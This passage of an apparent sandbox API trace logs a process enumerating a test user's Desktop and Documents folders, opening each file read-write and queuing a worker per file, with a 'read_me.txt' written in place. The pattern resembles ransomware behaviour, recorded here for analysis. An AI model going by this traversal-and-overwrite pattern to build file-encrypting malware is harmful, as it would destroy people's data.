dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="ApDQZcKbc6uihxPt.mp3", cAlternateFileName="APDQZC~1.MP3")) returned 1 [0074.060] wnsprintfW (in: pszDest=0x8be0050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\ApDQZcKbc6uihxPt.mp3") returned 78 [0074.060] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\ApDQZcKbc6uihxPt.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\aeutpkyrnlsv9u1\\apdqzckbc6uihxpt.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x82c [0074.060] QueueUserWorkItem (Function=0x404e00, Context=0x82c, Flags=0x0) returned 1 [0074.060] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3f5d32c0, ftCreationTime.dwHighDateTime=0x1d4c9d0, ftLastAccessTime.dwLowDateTime=0xa2c08c50, ftLastAccessTime.dwHighDateTime=0x1d4d51e, ftLastWriteTime.dwLowDateTime=0xa2c08c50, ftLastWriteTime.dwHighDateTime=0x1d4d51e, nFileSizeHigh=0x0, nFileSizeLow=0x15265, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="kv_sY.pps", cAlternateFileName="")) returned 1 [0074.060] wnsprintfW (in: pszDest=0x8be0050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\kv_sY.pps") returned 67 [0074.060] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\kv_sY.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\aeutpkyrnlsv9u1\\kv_sy.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x830 [0074.060] QueueUserWorkItem (Function=0x404e00, Context=0x830, Flags=0x0) returned 1 [0074.060] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa3f75d00, ftCreationTime.dwHighDateTime=0x1d4d09c, ftLastAccessTime.dwLowDateTime=0x16a74c30, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16a74c30, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="lnC8VFH_7XvA0rvnIlk_", cAlternateFileName="LNC8VF~1")) returned 1 [0074.060] wnsprintfW (in: pszDest=0x8be0050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\lnC8VFH_7XvA0rvnIlk_") returned 78 [0074.060] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a75aeb0, ftCreationTime.dwHighDateTime=0x1d4caac, ftLastAccessTime.dwLowDateTime=0x920506a0, ftLastAccessTime.dwHighDateTime=0x1d4c995, ftLastWriteTime.dwLowDateTime=0x920506a0, ftLastWriteTime.dwHighDateTime=0x1d4c995, nFileSizeHigh=0x0, nFileSizeLow=0x4b8, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="PDFNvUZaxs.mkv", cAlternateFileName="PDFNVU~1.MKV")) returned 1 [0074.060] wnsprintfW (in: pszDest=0x8be0050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\PDFNvUZaxs.mkv") returned 72 [0074.060] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\PDFNvUZaxs.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\aeutpkyrnlsv9u1\\pdfnvuzaxs.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x834 [0074.060] QueueUserWorkItem (Function=0x404e00, Context=0x834, Flags=0x0) returned 1 [0074.060] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16a74c30, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x16a74c30, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16ac0ef0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0074.060] wnsprintfW (in: pszDest=0x8be0050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\read_me.txt") returned 69 [0074.061] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\aeutpkyrnlsv9u1\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x838 [0074.061] QueueUserWorkItem (Function=0x404e00, Context=0x838, Flags=0x0) returned 1 [0074.061] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70181af0, ftCreationTime.dwHighDateTime=0x1d4cc8d, ftLastAccessTime.dwLowDateTime=0xbd87a3b0, ftLastAccessTime.dwHighDateTime=0x1d4cd5e, ftLastWriteTime.dwLowDateTime=0xbd87a3b0, ftLastWriteTime.dwHighDateTime=0x1d4cd5e, nFileSizeHigh=0x0, nFileSizeLow=0x4f18, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="unlhsf.mp3", cAlternateFileName="")) returned 0 [0074.061] FindClose (in: hFindFile=0x2b26f8 | out: hFindFile=0x2b26f8) returned 1 [0074.061] wnsprintfW (in: pszDest=0x8be0050, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\read_me.txt") returned 69 [0074.061] GetProcessHeap () returned 0x280000 [0074.061] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8be0050 | out: hHeap=0x280000) returned 1 [0074.061] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 40 [0074.061] GetProcessHeap () returned 0x280000 [0074.061] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8b50020 | out: hHeap=0x280000) returned 1 [0074.132] GetProcessHeap () returned 0x280000 [0074.132] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8c21078 [0074.161] wnsprintfW (in: pszDest=0x8c21078, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*") returned 45 [0074.161] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*", lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x16ba5730, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16ba5730, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2b2738 [0074.161] wnsprintfW (in: pszDest=0x8c21078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\.") returned 45 [0074.161] FindNextFileW (in: hFindFile=0x2b2738, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x16ba5730, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16ba5730, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0074.161] wnsprintfW (in: pszDest=0x8c21078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\..") returned 46 [0074.161] FindNextFileW (in: hFindFile=0x2b2738, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcfcfcf0, ftCreationTime.dwHighDateTime=0x1d4c729, ftLastAccessTime.dwLowDateTime=0x3ba5af10, ftLastAccessTime.dwHighDateTime=0x1d4cb3b, ftLastWriteTime.dwLowDateTime=0x3ba5af10, ftLastWriteTime.dwHighDateTime=0x1d4cb3b, nFileSizeHigh=0x0, nFileSizeLow=0xeac2, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="-H6-nCLy9iKddFOfC7X.ots", cAlternateFileName="-H6-NC~1.OTS")) returned 1 [0074.161] wnsprintfW (in: pszDest=0x8c21078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-H6-nCLy9iKddFOfC7X.ots") returned 67 [0074.161] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-H6-nCLy9iKddFOfC7X.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\-h6-ncly9ikddfofc7x.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x868 [0074.161] QueueUserWorkItem (Function=0x404e00, Context=0x868, Flags=0x0) returned 1 [0074.161] FindNextFileW (in: hFindFile=0x2b2738, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc102ff30, ftCreationTime.dwHighDateTime=0x1d5486a, ftLastAccessTime.dwLowDateTime=0xdbb2e1f0, ftLastAccessTime.dwHighDateTime=0x1d56210, ftLastWriteTime.dwLowDateTime=0xdbb2e1f0, ftLastWriteTime.dwHighDateTime=0x1d56210, nFileSizeHigh=0x0, nFileSizeLow=0x16b31, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="0ZG0M.xlsx", cAlternateFileName="0ZG0M~1.XLS")) returned 1 [0074.161] wnsprintfW (in: pszDest=0x8c21078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0ZG0M.xlsx") returned 54 [0074.161] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0ZG0M.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\0zg0m.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x86c [0074.161] QueueUserWorkItem (Function=0x404e00, Context=0x86c, Flags=0x0) returned 1 [0074.162] FindNextFileW (in: hFindFile=0x2b2738, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8780fab0, ftCreationTime.dwHighDateTime=0x1d57bbd, ftLastAccessTime.dwLowDateTime=0x42b4d640, ftLastAccessTime.dwHighDateTime=0x1d53fd1, ftLastWriteTime.dwLowDateTime=0x42b4d640, ftLastWriteTime.dwHighDateTime=0x1d53fd1, nFileSizeHigh=0x0, nFileSizeLow=0xa858, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="1hd5ypV.docx", cAlternateFileName="1HD5YP~1.DOC")) returned 1 [0074.162] wnsprintfW (in: pszDest=0x8c21078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1hd5ypV.docx") returned 56 [0074.162] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1hd5ypV.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1hd5ypv.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x870 [0074.162] QueueUserWorkItem (Function=0x404e00, Context=0x870, Flags=0x0) returned 1 [0074.162] FindNextFileW (in: hFindFile=0x2b2738, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70338e90, ftCreationTime.dwHighDateTime=0x1d52c3a, ftLastAccessTime.dwLowDateTime=0x499ba9c0, ftLastAccessTime.dwHighDateTime=0x1d5976f, ftLastWriteTime.dwLowDateTime=0x499ba9c0, ftLastWriteTime.dwHighDateTime=0x1d5976f, nFileSizeHigh=0x0, nFileSizeLow=0x12b70, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="2TTC6.docx", cAlternateFileName="2TTC6~1.DOC")) returned 1 [0074.162] wnsprintfW (in: pszDest=0x8c21078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2TTC6.docx") returned 54 [0074.162] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2TTC6.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\2ttc6.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x874 [0074.162] QueueUserWorkItem (Function=0x404e00, Context=0x874, Flags=0x0) returned 1 [0074.162] FindNextFileW (in: hFindFile=0x2b2738, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4460e4d0, ftCreationTime.dwHighDateTime=0x1d58cce, ftLastAccessTime.dwLowDateTime=0x83c8afb0, ftLastAccessTime.dwHighDateTime=0x1d595be, ftLastWriteTime.dwLowDateTime=0x83c8afb0, ftLastWriteTime.dwHighDateTime=0x1d595be, nFileSizeHigh=0x0, nFileSizeLow=0x9843, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="3V6OZ8oC-7w9cG YFL.docx", cAlternateFileName="3V6OZ8~1.DOC")) returned 1 [0074.162] wnsprintfW (in: pszDest=0x8c21078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3V6OZ8oC-7w9cG YFL.docx") returned 67 [0074.162] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3V6OZ8oC-7w9cG YFL.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3v6oz8oc-7w9cg yfl.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x878 [0074.162] QueueUserWorkItem (Function=0x404e00, Context=0x878, Flags=0x0) returned 1 [0074.162] FindNextFileW (in: hFindFile=0x2b2738, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10dd3aa0, ftCreationTime.dwHighDateTime=0x1d568de, ftLastAccessTime.dwLowDateTime=0x198731d0, ftLastAccessTime.dwHighDateTime=0x1d53038, ftLastWriteTime.dwLowDateTime=0x198731d0, ftLastWriteTime.dwHighDateTime=0x1d53038, nFileSizeHigh=0x0, nFileSizeLow=0x10c45, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="5O1Ef9xbUFGU5rk38I.xlsx", cAlternateFileName="5O1EF9~1.XLS")) returned 1 [0074.162] wnsprintfW (in: pszDest=0x8c21078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5O1Ef9xbUFGU5rk38I.xlsx") returned 67 [0074.162] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5O1Ef9xbUFGU5rk38I.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\5o1ef9xbufgu5rk38i.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x87c [0074.162] QueueUserWorkItem (Function=0x404e00, Context=0x87c, Flags=0x0) returned 1 [0074.162] FindNextFileW (in: hFindFile=0x2b2738, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b004ce0, ftCreationTime.dwHighDateTime=0x1d593f3, ftLastAccessTime.dwLowDateTime=0x4133ce40, ftLastAccessTime.dwHighDateTime=0x1d530ac, ftLastWriteTime.dwLowDateTime=0x4133ce40, ftLastWriteTime.dwHighDateTime=0x1d530ac, nFileSizeHigh=0x0, nFileSizeLow=0x16636, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="5Q7wz4WHOl.xlsx", cAlternateFileName="5Q7WZ4~1.XLS")) returned 1 [0074.162] wnsprintfW (in: pszDest=0x8c21078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5Q7wz4WHOl.xlsx") returned 59 [0074.162] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5Q7wz4WHOl.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\5q7wz4whol.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x880 [0074.163] QueueUserWorkItem (Function=0x404e00, Context=0x880, Flags=0x0) returned 1 [0074.163] FindNextFileW (in: hFindFile=0x2b2738, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa70e1b0, ftCreationTime.dwHighDateTime=0x1d4c57f, ftLastAccessTime.dwLowDateTime=0xfe911e80, ftLastAccessTime.dwHighDateTime=0x1d4cd78, ftLastWriteTime.dwLowDateTime=0xfe911e80, ftLastWriteTime.dwHighDateTime=0x1d4cd78, nFileSizeHigh=0x0, nFileSizeLow=0xe565, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="7f5cSkJKHH.odp", cAlternateFileName="7F5CSK~1.ODP")) returned 1 [0074.163] wnsprintfW (in: pszDest=0x8c21078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7f5cSkJKHH.odp") returned 58 [0074.163] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7f5cSkJKHH.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\7f5cskjkhh.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x884 [0074.163] QueueUserWorkItem (Function=0x404e00, Context=0x884, Flags=0x0) returned 1 [0074.163] FindNextFileW (in: hFindFile=0x2b2738, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78ece1c0, ftCreationTime.dwHighDateTime=0x1d52dad, ftLastAccessTime.dwLowDateTime=0x58bbda10, ftLastAccessTime.dwHighDateTime=0x1d56b41, ftLastWriteTime.dwLowDateTime=0x58bbda10, ftLastWriteTime.dwHighDateTime=0x1d56b41, nFileSizeHigh=0x0, nFileSizeLow=0x971f, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="BtMX4.xlsx", cAlternateFileName="BTMX4~1.XLS")) returned 1 [0074.163] wnsprintfW (in: pszDest=0x8c21078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\BtMX4.xlsx") returned 54 [0074.163] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\BtMX4.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\btmx4.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x888 [0074.163] QueueUserWorkItem (Function=0x404e00, Context=0x888, Flags=0x0) returned 1 [0074.163] FindNextFileW (in: hFindFile=0x2b2738, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d207440, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0074.163] wnsprintfW (in: pszDest=0x8c21078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini") returned 55 [0074.163] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x88c [0074.163] QueueUserWorkItem (Function=0x404e00, Context=0x88c, Flags=0x0) returned 1 [0074.163] FindNextFileW (in: hFindFile=0x2b2738, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6aeb3100, ftCreationTime.dwHighDateTime=0x1d4d1f8, ftLastAccessTime.dwLowDateTime=0x890af30, ftLastAccessTime.dwHighDateTime=0x1d4d540, ftLastWriteTime.dwLowDateTime=0x890af30, ftLastWriteTime.dwHighDateTime=0x1d4d540, nFileSizeHigh=0x0, nFileSizeLow=0x15612, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="IUl9jUZBgAS.ppt", cAlternateFileName="IUL9JU~1.PPT")) returned 1 [0074.163] wnsprintfW (in: pszDest=0x8c21078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\IUl9jUZBgAS.ppt") returned 59 [0074.163] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\IUl9jUZBgAS.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\iul9juzbgas.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x890 [0074.164] QueueUserWorkItem (Function=0x404e00, Context=0x890, Flags=0x0) returned 1 [0074.164] FindNextFileW (in: hFindFile=0x2b2738, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x237f1350, ftCreationTime.dwHighDateTime=0x1d593b2, ftLastAccessTime.dwLowDateTime=0x8849de50, ftLastAccessTime.dwHighDateTime=0x1d56798, ftLastWriteTime.dwLowDateTime=0x8849de50, ftLastWriteTime.dwHighDateTime=0x1d56798, nFileSizeHigh=0x0, nFileSizeLow=0x5ff8, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="k040WIM4qywb6Jrj.pptx", cAlternateFileName="K040WI~1.PPT")) returned 1 [0074.164] wnsprintfW (in: pszDest=0x8c21078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k040WIM4qywb6Jrj.pptx") returned 65 [0074.164] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k040WIM4qywb6Jrj.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\k040wim4qywb6jrj.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x894 [0074.164] QueueUserWorkItem (Function=0x404e00, Context=0x894, Flags=0x0) returned 1 [0074.164] FindNextFileW (in: hFindFile=0x2b2738, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2f40d620, ftCreationTime.dwHighDateTime=0x1d4d5a7, ftLastAccessTime.dwLowDateTime=0x16b33310, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16b33310, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="mxPjuqgnTcEZFOmeY", cAlternateFileName="MXPJUQ~1")) returned 1 [0074.164] wnsprintfW (in: pszDest=0x8c21078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY") returned 61 [0074.164] FindNextFileW (in: hFindFile=0x2b2738, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0074.164] wnsprintfW (in: pszDest=0x8c21078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music") returned 52 [0074.164] FindNextFileW (in: hFindFile=0x2b2738, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0074.164] wnsprintfW (in: pszDest=0x8c21078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures") returned 55 [0074.164] FindNextFileW (in: 